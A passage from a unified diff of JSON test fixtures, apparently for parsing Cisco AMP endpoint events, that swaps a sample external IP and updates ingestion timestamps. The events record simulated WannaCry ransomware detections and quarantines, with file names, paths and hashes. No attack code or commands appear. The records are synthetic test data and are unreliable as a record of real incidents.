"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective 
Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -1222,7 +1222,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1265,7 +1265,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1279,8 +1279,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798686588Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010717500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1302,7 +1302,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1349,7 +1349,7 @@ "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1363,8 +1363,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798689021Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}", + "ingested": "2021-12-09T13:35:47.010723Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1386,7 +1386,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1429,7 +1429,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1443,8 +1443,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798691318Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010728300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1466,7 +1466,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1509,7 +1509,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1523,8 +1523,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798693584Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010733500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1546,7 +1546,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1587,7 +1587,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1597,8 +1597,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798695843Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010738700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1618,7 +1618,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1663,7 +1663,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1673,8 +1673,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798698096Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010744Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective 
Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -1694,7 +1694,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1741,7 +1741,7 @@ "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1755,8 +1755,8 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-30T00:15:10.798700344Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
+ "ingested": "2021-12-09T13:35:47.010749300Z",
+ "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
 "code": "553648147",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -1778,7 +1778,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1825,7 +1825,7 @@
 "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1839,8 +1839,8 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-30T00:15:10.798702596Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
+ "ingested": "2021-12-09T13:35:47.010753100Z",
+ "original": 
